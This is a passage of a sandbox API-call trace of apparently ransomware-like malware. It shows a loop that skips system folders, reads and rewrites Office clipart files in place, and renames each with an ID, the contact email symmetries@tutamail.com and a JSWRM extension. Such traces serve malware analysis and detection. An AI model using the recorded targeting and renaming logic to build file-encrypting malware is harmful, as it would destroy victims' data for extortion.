lpString2="msocache") returned 1 [0092.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0092.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02388_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02388_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02388_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0092.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0092.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02388_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02388_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02388_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0092.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0092.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0092.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0092.474] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02388_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02388_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.474] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3204) returned 1 [0092.474] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc80) returned 0x23fc98 [0092.474] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xc80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xc80, lpOverlapped=0x0) returned 1 [0092.476] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.476] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xc80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xc80, lpOverlapped=0x0) returned 1 [0092.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0092.476] CloseHandle (hObject=0x314) returned 1 [0092.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0092.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0092.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0092.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0092.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0092.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0092.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0092.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0092.476] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02388_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02388_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02388_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02388_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0092.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0092.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0092.477] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf68f613, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf68f613, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf68f613, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb2c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02389_.WMF", cAlternateFileName="")) returned 1 [0092.477] lstrcmpiW (lpString1="NA02389_.WMF", lpString2=".") returned 1 [0092.477] lstrcmpiW (lpString1="NA02389_.WMF", lpString2="..") returned 1 [0092.477] lstrcmpiW (lpString1="NA02389_.WMF", lpString2="...") returned 1 [0092.477] lstrcmpiW (lpString1="NA02389_.WMF", lpString2="windows") returned -1 [0092.477] lstrcmpiW (lpString1="NA02389_.WMF", lpString2="recovery") returned -1 [0092.477] lstrcmpiW (lpString1="NA02389_.WMF", lpString2="perflogs") returned -1 [0092.477] lstrcmpiW (lpString1="NA02389_.WMF", lpString2="documents and settings") returned 1 [0092.477] lstrcmpiW (lpString1="NA02389_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.477] lstrcmpiW (lpString1="NA02389_.WMF", lpString2="system volume information") returned -1 [0092.477] lstrcmpiW (lpString1="NA02389_.WMF", lpString2="msocache") returned 1 [0092.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0092.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02389_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02389_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02389_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0092.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0092.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02389_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02389_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02389_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0092.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0092.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0092.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0092.478] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02389_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02389_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.478] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2860) returned 1 [0092.478] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb20) returned 0x23fc98 [0092.478] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xb20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xb20, lpOverlapped=0x0) returned 1 [0092.480] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.480] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xb20, lpOverlapped=0x0) returned 1 [0092.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0092.480] CloseHandle (hObject=0x314) returned 1 [0092.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0092.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0092.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0092.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0092.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0092.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0092.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.481] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02389_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02389_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02389_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02389_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0092.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0092.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0092.482] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10196468, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10196468, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10196468, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe64, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02390_.WMF", cAlternateFileName="")) returned 1 [0092.482] lstrcmpiW (lpString1="NA02390_.WMF", lpString2=".") returned 1 [0092.482] lstrcmpiW (lpString1="NA02390_.WMF", lpString2="..") returned 1 [0092.482] lstrcmpiW (lpString1="NA02390_.WMF", lpString2="...") returned 1 [0092.482] lstrcmpiW (lpString1="NA02390_.WMF", lpString2="windows") returned -1 [0092.482] lstrcmpiW (lpString1="NA02390_.WMF", lpString2="recovery") returned -1 [0092.482] lstrcmpiW (lpString1="NA02390_.WMF", lpString2="perflogs") returned -1 [0092.482] lstrcmpiW (lpString1="NA02390_.WMF", lpString2="documents and settings") returned 1 [0092.482] lstrcmpiW (lpString1="NA02390_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.482] lstrcmpiW (lpString1="NA02390_.WMF", lpString2="system volume information") returned -1 [0092.482] lstrcmpiW (lpString1="NA02390_.WMF", lpString2="msocache") returned 1 [0092.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0092.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02390_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02390_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02390_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0092.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0092.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02390_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02390_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02390_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0092.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0092.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0092.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0092.482] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02390_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02390_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.483] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3684) returned 1 [0092.483] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe60) returned 0x23fc98 [0092.483] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xe60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xe60, lpOverlapped=0x0) returned 1 [0092.487] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.488] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xe60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xe60, lpOverlapped=0x0) returned 1 [0092.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0092.488] CloseHandle (hObject=0x314) returned 1 [0092.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0092.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0092.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0092.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0092.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0092.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0092.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0092.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0092.488] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02390_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02390_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02390_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02390_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0092.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0092.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0092.489] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6b584f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6b584f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6dbaae, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e98, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02398_.WMF", cAlternateFileName="")) returned 1 [0092.489] lstrcmpiW (lpString1="NA02398_.WMF", lpString2=".") returned 1 [0092.489] lstrcmpiW (lpString1="NA02398_.WMF", lpString2="..") returned 1 [0092.489] lstrcmpiW (lpString1="NA02398_.WMF", lpString2="...") returned 1 [0092.489] lstrcmpiW (lpString1="NA02398_.WMF", lpString2="windows") returned -1 [0092.489] lstrcmpiW (lpString1="NA02398_.WMF", lpString2="recovery") returned -1 [0092.489] lstrcmpiW (lpString1="NA02398_.WMF", lpString2="perflogs") returned -1 [0092.489] lstrcmpiW (lpString1="NA02398_.WMF", lpString2="documents and settings") returned 1 [0092.489] lstrcmpiW (lpString1="NA02398_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.489] lstrcmpiW (lpString1="NA02398_.WMF", lpString2="system volume information") returned -1 [0092.489] lstrcmpiW (lpString1="NA02398_.WMF", lpString2="msocache") returned 1 [0092.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0092.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02398_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02398_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02398_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0092.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0092.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02398_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02398_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02398_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0092.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0092.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0092.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.490] WideCharToMultiByte (in: 